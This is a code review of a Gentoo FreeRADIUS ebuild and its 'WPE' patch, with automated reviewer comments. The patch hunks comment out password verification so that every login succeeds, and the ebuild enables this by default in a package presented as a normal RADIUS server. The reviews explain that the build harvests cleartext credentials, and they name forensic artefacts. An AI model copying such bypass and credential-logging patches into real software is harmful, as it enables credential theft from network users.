snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,10 +732,13 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,11 +760,14 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -765,16 +787,21 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE - always succeed */
+ /*
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+/*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+*/
goto done;
break;
diff -crB freeradius-server-2.1.7/src/include/radiusd.h freeradius-server-2.1.7-wpe/src/include/radiusd.h
*** freeradius-server-2.1.7/src/include/radiusd.h 2011-11-05 09:44:19.347294768 +0800
--- freeradius-server-2.1.7-wpe/src/include/radiusd.h 2011-11-05 09:49:42.750274303 +0800
@@ -546,6 +546,7 @@
__attribute__ ((format (printf, 2, 3)))
#endif
;
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen);
int log_debug(const char *, ...)
#ifdef __GNUC__
__attribute__ ((format (printf, 1, 2)))
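Review bot: The `rlm_mschap.c`, `eap_md5.c` and `rlm_pap.c` hunks comment out every `rad_digest_cmp`/`memcmp` verification, so a server built with this patch returns Access-Accept for any credential while the new `log_wpe` in the `log.c` hunk appends the cleartext password (from `rlm_pap.c` and `auth.c`) or the challenge/response pair to `wpelogfile`; the patch has no header and states none of this. A header comment at the top of the file naming the behaviour change and the default log path (`${logdir}/freeradius-server-wpe.log`, set in the `mainconfig.c` hunk) is the minimum, and the same facts belong in the ebuild that applies it. For anyone auditing a host, the `wpelogfile` directive in radiusd.conf and that log file are the artefacts that identify this build. Inside `log_wpe`, the `DEBUG2` text is prefixed `rlm_mschap:` although the function lives in `log.c` and is called from PAP, LEAP, MD5 and `auth.c` as well, which makes the debug output misleading; `" log_wpe: FAILED: Unable to open output log file %s: %s"` is the prefix I would use.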


@ -0,0 +1,3 @@
DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
DEFAULT Cleartext-Password := "a"
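Review bot: The second `DEFAULT Cleartext-Password := "a"` line looks unreachable: as far as I can tell the first `DEFAULT` entry matches every request (its only item is a `:=` assignment, not a comparison) and has no `Fall-Through`, so processing of the users file stops there. Either drop the second line or add a comment saying which entry is intended, since a reader will otherwise assume both apply.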


@ -0,0 +1,156 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.11.ebuild,v 1.3 2011/10/13 12:16:12 nativemad Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
enewgroup radiusd
enewuser radiusd -1 -1 /var/log/radius radiusd
}
src_prepare() {
epatch "${FILESDIR}/${PN}-2.1.10-versionless-la-files.patch"
epatch "${FILESDIR}/${PN}-2.1.10-ssl.patch"
epatch "${FILESDIR}/${PN}-2.1.10-qafixes.patch"
epatch "${FILESDIR}/${PN}-2.1.10-pkglibdir.patch"
if use wpe; then epatch "${FILESDIR}/${P}-wpe.patch"; fi
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool \
--localstatedir=/var ${myconf} || die "econf failed"
}
src_compile() {
emake -j1 || die "emake failed"
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radiusd
dodir /etc/raddb
diropts -m0750 -o radiusd -g radiusd
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${D}" install || die "make install failed"
sed -i -e 's:^#user *= *nobody:user = radiusd:;s:^#group *= *nobody:group = radiusd:' \
"${D}"/etc/raddb/radiusd.conf
chown -R root:radiusd "${D}"/etc/raddb/*
pamd_mimic_system radiusd auth account password session
mv "${D}/usr/share/doc/${PN}" "${D}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r1" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${D}"/etc/raddb/certs
emake all
}
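Review bot: `IUSE` enables `wpe` by default (`+wpe`), so a plain emerge of this overlay's freeradius produces a server that accepts any password and logs credentials in cleartext, with `clients_wpe.conf`, `eap_wpe.conf` and `users_wpe` overwriting the stock configs in `src_prepare`; that should be opt-in (`wpe` without the `+`) and announced, e.g. a `pkg_postinst` with `ewarn "USE=wpe builds a server that accepts any password and logs credentials to the wpelogfile set in radiusd.conf"`. `append-flags -lpthread` in `src_prepare` pushes a linker flag through CFLAGS and relies on flag-o-matic, which is not on the `inherit` line (it may arrive through another eclass; worth confirming) — `append-ldflags -lpthread` after `inherit flag-o-matic` is the usual form. The `|| die` after `econf` and `emake` is redundant under `EAPI="4"`, where both die on failure, and `chown -R root:radiusd "${D}"/etc/raddb/*` would normally be `fowners -R root:radiusd /etc/raddb`.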


@ -24,7 +24,7 @@ RDEPEND="!net-dialup/cistronradius
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( virtual/postgresql-server )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )